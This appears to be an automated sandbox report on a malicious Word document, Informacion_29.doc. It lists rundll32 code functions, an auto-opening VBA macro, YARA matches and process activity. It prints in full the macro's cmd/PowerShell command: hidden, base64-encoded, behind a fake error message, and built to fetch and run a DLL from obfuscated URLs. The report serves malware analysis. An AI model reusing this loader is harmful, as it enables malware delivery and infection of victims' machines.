Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_1001B773 13_2_1001B773
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_1001C986 13_2_1001C986
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_1001B9A5 13_2_1001B9A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_100079E0 13_2_100079E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_1001CBE3 13_2_1001CBE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_1001BBE6 13_2_1001BBE6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_1001BE18 13_2_1001BE18
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_1002FE2A 13_2_1002FE2A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_1001CE40 13_2_1001CE40
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041BB41F 13_2_041BB41F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041BF536 13_2_041BF536
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041B568E 13_2_041B568E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041B8736 13_2_041B8736
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041BC0C6 13_2_041BC0C6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041C42DA 13_2_041C42DA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041C02C3 13_2_041C02C3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041C73AC 13_2_041C73AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041B2C63 13_2_041B2C63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041BEE78 13_2_041BEE78
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041C3895 13_2_041C3895
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041C4B41 13_2_041C4B41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041B7B63 13_2_041B7B63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041C340A 13_2_041C340A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041BF444 13_2_041BF444
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041B153C 13_2_041B153C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041C9586 13_2_041C9586
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041B96CD 13_2_041B96CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041C26F5 13_2_041C26F5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041BB75F 13_2_041BB75F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041B6754 13_2_041B6754
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041C1773 13_2_041C1773
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041BC769 13_2_041BC769
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041C878F 13_2_041C878F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041B17AC 13_2_041B17AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041BD7EB 13_2_041BD7EB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041C67E9 13_2_041C67E9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041BE05A 13_2_041BE05A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041B80BA 13_2_041B80BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041B60B9 13_2_041B60B9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041CA0AF 13_2_041CA0AF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041C20C5 13_2_041C20C5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041C511B 13_2_041C511B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041BB112 13_2_041BB112
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041C61B8 13_2_041C61B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041C71EF 13_2_041C71EF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041C31E2 13_2_041C31E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041B1280 13_2_041B1280
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041B62A3 13_2_041B62A3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041C12E2 13_2_041C12E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041C2349 13_2_041C2349
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041BE377 13_2_041BE377
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041B839D 13_2_041B839D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041C63C1 13_2_041C63C1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041B1CFA 13_2_041B1CFA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041C8D1C 13_2_041C8D1C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041C5D1D 13_2_041C5D1D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041C7D03 13_2_041C7D03
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041C0D33 13_2_041C0D33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041B6D9F 13_2_041B6D9F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041C6DB9 13_2_041C6DB9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041C7F1F 13_2_041C7F1F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041C0F0C 13_2_041C0F0C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041C8F49 13_2_041C8F49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041B8F78 13_2_041B8F78
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041B9FDC 13_2_041B9FDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041C3FE7 13_2_041C3FE7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041C687F 13_2_041C687F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041C889D 13_2_041C889D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041B48BD 13_2_041B48BD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041B88E5 13_2_041B88E5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041B7998 13_2_041B7998
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041BF98C 13_2_041BF98C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041B69A0 13_2_041B69A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041C7A0F 13_2_041C7A0F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041B2A30 13_2_041B2A30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041B9A37 13_2_041B9A37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041B4A35 13_2_041B4A35
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041BEA4C 13_2_041BEA4C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041C5A61 13_2_041C5A61
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041C8ADC 13_2_041C8ADC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041C2B16 13_2_041C2B16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041BBB3A 13_2_041BBB3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041C9B45 13_2_041C9B45
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041B5B79 13_2_041B5B79
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041C0B68 13_2_041C0B68
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041C1BDF 13_2_041C1BDF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03444B41 14_2_03444B41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03442349 14_2_03442349
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0343C769 14_2_0343C769
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0343E377 14_2_0343E377
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03435B79 14_2_03435B79
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03447D03 14_2_03447D03
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03442B16 14_2_03442B16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03448D1C 14_2_03448D1C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03438736 14_2_03438736
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0343F536 14_2_0343F536
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0343153C 14_2_0343153C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03439FDC 14_2_03439FDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_034431E2 14_2_034431E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0343F98C 14_2_0343F98C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_034473AC 14_2_034473AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03432C63 14_2_03432C63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03445A61 14_2_03445A61
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0343B41F 14_2_0343B41F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_034402C3 14_2_034402C3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03431CFA 14_2_03431CFA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_034360B9 14_2_034360B9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03449B45 14_2_03449B45
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03448F49 14_2_03448F49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03436754 14_2_03436754
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0343B75F 14_2_0343B75F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03437B63 14_2_03437B63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03440B68 14_2_03440B68
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03441773 14_2_03441773
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03438F78 14_2_03438F78
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03440F0C 14_2_03440F0C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0343B112 14_2_0343B112
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03445D1D 14_2_03445D1D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03447F1F 14_2_03447F1F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0344511B 14_2_0344511B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03440D33 14_2_03440D33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0343BB3A 14_2_0343BB3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_034463C1 14_2_034463C1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03441BDF 14_2_03441BDF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03443FE7 14_2_03443FE7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0343D7EB 14_2_0343D7EB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_034471EF 14_2_034471EF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_034467E9 14_2_034467E9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03449586 14_2_03449586
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0344878F 14_2_0344878F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03437998 14_2_03437998
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03436D9F 14_2_03436D9F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0343839D 14_2_0343839D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_034369A0 14_2_034369A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_034317AC 14_2_034317AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_034461B8 14_2_034461B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03446DB9 14_2_03446DB9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0343F444 14_2_0343F444
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0343EA4C 14_2_0343EA4C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0343E05A 14_2_0343E05A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0343EE78 14_2_0343EE78
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0344687F 14_2_0344687F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03447A0F 14_2_03447A0F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0344340A 14_2_0344340A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03432A30 14_2_03432A30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03439A37 14_2_03439A37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03434A35 14_2_03434A35
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_034420C5 14_2_034420C5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0343C0C6 14_2_0343C0C6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_034396CD 14_2_034396CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03448ADC 14_2_03448ADC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_034442DA 14_2_034442DA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_034388E5 14_2_034388E5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_034412E2 14_2_034412E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_034426F5 14_2_034426F5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03431280 14_2_03431280
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0343568E 14_2_0343568E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03443895 14_2_03443895
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0344889D 14_2_0344889D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_034362A3 14_2_034362A3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0344A0AF 14_2_0344A0AF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_034380BA 14_2_034380BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_034348BD 14_2_034348BD
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: Informacion_29.doc OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation OLE, VBA macro: Module Ouz_y28f7ehnqn, Function Document_open Name: Document_open
Document contains embedded VBA macros
Source: Informacion_29.doc OLE indicator, VBA macros: true
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100040F0 appears 46 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10029D17 appears 32 times
Tries to load missing DLLs
Source: C:\Windows\System32\svchost.exe Section loaded: xboxlivetitleid.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cdpsgshims.dll Jump to behavior
Yara signature match
Source: 00000004.00000002.289454945.0000018A154BB000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000003.278200486.0000018A2C3D3000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.280486298.0000018A13D20000.00000004.00000040.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.290625263.0000018A2C1D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.289399769.0000018A15456000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.280124224.0000018A123D5000.00000004.00000040.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.289286993.0000018A153A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.290618766.0000018A2C1C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.289171312.0000018A152BB000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.289463456.0000018A154C9000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.289073167.0000018A15205000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: Q27V.dll.4.dr Static PE information: Section: .rsrc ZLIB complexity 0.995798093463
Source: classification engine Classification label: mal100.troj.evad.winDOC@24/17@5/9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03431C88 CreateToolhelp32Snapshot, 14_2_03431C88
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7012:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7084:120:WilError_01
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\{335C5621-0832-4843-9FBC-E9AB4A592B32} - OProcSessId.dat Jump to behavior
Source: Informacion_29.doc OLE indicator, Word Document stream: true
Source: Informacion_29.doc OLE document summary: title field not present or empty
Source: Informacion_29.doc OLE document summary: edited time not present or 0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\msg.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nsghoht\Gbh5r9o\Q27V.dll,Control_RunDLL
Source: Informacion_29.doc Virustotal: Detection: 62%
Source: Informacion_29.doc ReversingLabs: Detection: 79%
Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAAcABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwAxAF8AJwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBsAGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQByACcAKwAnADkAbwAnACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwArACcAMgA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgACAATABzACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBDAFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAoACcAQgA2ACcAKwAnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAAKAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAnACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9ACcAKwAoACcATgAnACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgAJwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBbAEMASABBAFIAXQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF8AdgBhAGEAPQAoACcAXQAnACsAKAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBsACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcAKwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAnACsAJwBNACcAKwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsAKAAnAF0AJwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAwACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgAnACsAJwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcAQABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQArACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0AJwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnAEAAJwArACcAXQBiACcAKQArACcAMgAnACsA
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAAcABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwAxAF8AJwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBsAGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAE